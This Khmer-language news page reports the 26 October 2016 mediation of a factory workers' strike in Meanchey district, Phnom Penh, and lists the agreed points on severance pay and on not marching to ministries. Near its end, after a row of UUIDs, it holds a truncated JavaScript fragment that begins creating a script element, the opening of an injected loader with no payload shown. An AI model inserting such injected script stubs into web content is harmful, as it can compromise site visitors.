Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

លោក ឌី រត្ន័ខេមរុណ សំណូមពរ កម្មករ កម្មការនី កុំធ្វើការដង្ហែក្បួនឬ ញ្ញាតិ ទៅដាក់តាមអង្គភាពក្រសួង ជំនាញពាក់ព័ន្ធ

ភ្នំពេញ៖ នៅព្រឹកម៉ោង ៩ ថ្ងៃទី ២៦ ខែ តុលា ឆ្នាំ ២០១៦ លោក ឌី រត្ន័ខេមរុណ អភិបាលរងខណ្ឌមានជ័យ បានសហការជាមួយលោក សន សុភាព តំណាងក្រសួងការងារ ចុះសំរបសំរួលបញ្ហាកូដកម្ម របស់កម្មករ កម្មការនី នៅភូមិទ្រា៤ សង្កាត់ស្ទឹងមានជ័យ ខណ្ឌមានជ័យ ដោយមានការចូលរួម ពី លោក សេង ស៊ីវណ្ណថា សមាជិកក្រុមប្រឹក្សាសង្កាត់ ស្ទឹងមានជ័យ លោក តំណាងបុស្តិ៍ រដ្ឋបាលស្ទឹងមានជ័យ លោក ខេង គឹម សាន្ត ប្រធានការិយាល័យ ឩស្សាហកម្មខណ្ឌ លោក ពុំ អឿ ប្រធានការិយាល័យបរិស្ថានខណ្ឌ លោក មេភូមិ រួមទាំងក្រុមការងារតំណាងនិយោជក នៅរោងចក្រ ខេមបូហ្គ័រហ្វុង បានអញ្ជើញចូលរួមដោះស្រាយ កូដកម្ម របស់កម្មករ កម្មការនី ដែលធ្វើការតវ៉ា ចំនួន០១ចំនុច ៖
ទី១ នៅពេលក្រុមហ៊ុនបិទទ្វារ ឬ ប្តូរទីតាំងថ្មីក្រុមហ៊ុនត្រូវទូទាត់ប្រាក់ឈ្នួល និងប្រាក់បំណាច់ផ្សេងៗ ជូនកម្មករកម្មការនីតាមនិតិវិធីច្បាប់ស្តីពីការងារ។

សហព័ន្ធសហជីពចំនួន៣
ទី១ សហព័ន្ធសហជីពកម្មករនិយោជិក ( លី វេង)
ទី២ សហព័ន្ធសហជីពបេះដូងកម្មករខ្មែរ ( សាន ថាន )
ទី៣ សហពន្ធ័សហជីពសម្ពន្ធ័កម្មករខ្មែរ

ក្នុងនោះដែលក្រុមការងារអាជ្ញាធរ ក៏ដូចតំណាងរោងចក្រ តំណាង កម្មករ កម្មការនី បានឯកភាព គ្នាលើចំនុច ដូចក្រោម ៖
១- ក្រោយពិភាក្សាគ្នារួចភាគីខាងរោងចក្រយកសំណើរទាំងអស់នេះ ទៅពិភាក្សា ជាមួយថៅកែរោងចក្រ ដោយទុករយះពេលចំនួន០២ថ្ងៃ ចាប់ពី ថ្ងៃទី ២៦ ខែ តុលា ឆ្នាំ ២០១៦ ដល់ថ្ងៃទី ២៧ តុលា ឆ្នាំ ២០១៦ ខាងរោងចក្រ និង តំណាងជំនាញពាក់ពន្ធ័ និងក្រុមការងារជួបគ្នាម្តងទៀតដើម្បីសំរេចនៅលទ្ធផលជូនកម្មករ កម្មការនី ។
២- ក្រុមការងារស្នើអោយរដ្ឋបាលរោងចក្ររៀបចំស្ថិតិ កម្មករ កម្មការនី លើកិច្ចសន្យាការងារដែល កម្មករ កម្មការនី ចូលបំរើការងារទៅតាមឆ្នាំនិមួយៗ ។
៣- ថៅកែរោងចក្រ ហាមដឹកសំភារះ ឬក៏ឩបករណ៏ ផ្សេងៗក្នុងរោងចក្រចេញទៅក្រៅករណីមិនទាន់ទូរទាត់ប្រាក់បំណាច់មុខងារជូនកម្មករ កម្មការនី ។
៤- អាជ្ញាធរខណ្ឌ និង ក្រុមការងារក្រសួង បានសំណូមពរ សុំមិនអោយ កម្មករ កម្មការនី ធ្វើការដង្ហែក្បួនឬ ក៏ហែរញ្ញាតិ ទៅដាក់តាមអង្គភាពក្រសួង ជំនាញពាក់ពន្ធ័ដែលអាចបណ្តាលអោយខូចសណ្តាប់ធ្នាប់លើដងផ្លូវសាធារណះនោះជាដាច់ខាត ។

ក្នុងនោះដែលកម្មករ កម្មការនី បានសម្តែងក្តីសប្បាយរីករាយបំផុតនៅពេលអាជ្ញាធរ និង តំណាងក្រសួងការងារបានចុះដោះស្រាយជូនមម្មករ កម្មការនី បានទាន់ពេលវេលា ។

7f8241ff-f621-40b7-adc4-36aaabe2daa7 33c66c76-5080-4512-a0f2-bb4706043b84 83a5b898-94b4-4403-ab1b-ef70ba3a7757 32076200-4707-4b29-82ff-45bb1e1265ab d534ca7a-56c8-4e69-b99b-63315ae708e3var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More